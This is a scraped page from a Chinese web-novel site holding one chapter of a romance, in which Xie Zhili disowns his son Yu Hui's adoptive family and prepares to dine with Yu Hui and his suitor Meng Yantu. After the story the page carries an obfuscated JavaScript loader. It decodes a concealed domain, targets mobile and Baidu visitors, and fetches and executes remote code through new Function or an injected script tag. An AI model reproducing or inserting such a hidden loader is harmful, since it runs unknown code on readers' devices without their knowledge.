烽火小说网

阅读记录  |   用户书架
上一章
目录 | 设置
下一章

第42页(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

('

......虞父说不出话来。

谢知礼极具压迫感的目光扫到一脸震惊的虞盛嘉身上,玩味一笑:哪有父母不爱自己的孩子......

可是他们从没有把虞回当过自己的孩子。

虞母看到他在看虞盛嘉,马上过去挡在他前面,保护的意味十足。

谢知礼深深看他们一眼,心里一阵酸痛。

他的孩子,从前就是跟这些人生活了这么些年吗。

虞总,不必再说什么了,虞回从今以后跟你们再没有任何关系,日后......别让我知道你们去找他。

虞父肩膀一下子垮了下去。

谢知礼站起身,居高临下的看着虞父:虞回不是任你们欺负的人,谢家更不是,虞总,不是不报,时候未到。

说完再没多给他们一个眼神,大步离开了。

坐上车,助理把手机递给他:老板,虞......小少爷刚才来了电话。

谢知礼脸色稍有好转,看见了微信上虞回发来的信息。

【晚上来吃饭吗?】

附加的还有一个地址,是虞回现在正在住的青城苑。

【好,可以叫上你的小男朋友吗?】

过了有两分钟,虞回给了回复【他在的。】

车里有些闷,谢知礼解开领口的两颗扣子,露出精致的锁骨,岁月好像对他格外优待,除了眉宇间常年藏着的那抹愁色,连眼角的细纹都成了时间沉淀出来的战利品。

助理从后视镜里看了一眼,觉得羡慕,但也感慨。

他跟着谢知礼很多年了,知道他有个过世的妻子,还有一个失踪的孩子,这么多年过去了,有多少人前赴后继的想爬这位的床,可他愣是没给任何人机会,自己守着回忆,一熬就是二十多年。

怎么了?谢知礼问。

他闭着眼都能感觉有人在看自己。

助理也没隐瞒,如实问:老板,小少爷刚找回来,您要不要考虑调个档期,多陪陪他?

谢知礼轻笑一声:用得着我陪?我要真天天带着呦呦,他那小男朋友不得恨死我。

他查了孟衍途,Y国财阀龙头沈家长子,下面只有一个同父同母的omega弟弟,从小在国内孟家长大,孟家只有他妈妈一个独生女,孟衍途日后必定是要独自一人掌管沈家和孟家两份基业,这样的人,不会太简单。

老板是对小少爷的男朋友不放心?那为何不直接退了这门亲事?

谢知礼何止是不放心啊,他是真的怕虞回被对方吃的连渣都剩,最后再被抛弃。

但,虞回喜欢,他也只能妥协:再看看吧。

小omega儿子他疼爱还来不及,现在虞回有谢家撑腰,想必那孟衍途也不敢拿捏他,就算以后真出了什么,还有他在后面收拾烂摊子,现在虞回开心最重要。

谢知礼知道虞回聪明,但小omega大多数人家都养的精细,他也不例外,尤其是虞回懂事又漂亮,让人想不疼惜都难。

谢大总裁根本想不到,现实情况其实恰恰相反。

青城苑——

孟衍途,你能不能安静会儿。

这是自从知道谢知礼晚上要来吃饭后,虞回的第五次提醒。

孟衍途像个小陀螺一样,一会儿收拾收拾这里,一会儿摆弄摆弄那里,看的虞回眼晕。

孟衍途把他喝空的水杯接过去放到桌子上,蹭过去求安慰:哥哥......我紧张嘛。

头一次见岳父,他特意搜了一下,谢知礼在商场上厮杀出来的名声看上去并不怎么......嗯,好相处,孟衍途脑子里已经预想过无数种结果。

要是老丈人甩一张卡过来,让他离开虞回,那他就要一哭二闹三上吊了!

还要让他看看,他的儿子昨晚已经把自己睡了,脖子上的牙印还在呢!

心机怨夫小孟凄凄惨惨戚戚,连带着看老婆的眼神都不对劲了。

嘤~哥哥你会维护我们这段还没开始就即将面临离婚危机的脆弱婚姻的对吧~~

虞回被他看的眉头紧皱:你怎么了?

孟茶茶哼唧一声,扑到他怀里,张嘴在人家脖子上乱啃:多留点证据。证明咱俩昨晚确实睡过了。

虞回:?......

要不要我提醒你,我们还没在一起,你现在这样属于耍流氓。

呦呦,我都追了你这么久了,怎么还不答应我嘛......

......虞回推了推埋在脖子间的脑袋:别叫我小名,还有,我什么时候说过不喜欢你了?

孟衍途猛地停下动作,坐了起来:你说什么??

虞回清冷的眉间透着无辜:我说什么了?

你刚才说……

孟衍途激动的话都没说完,就突然被敲门声打断了。

应该是父亲来了。虞回无情的推开他,去开门。', '。')

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2tqaGRiaGpzYmprZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间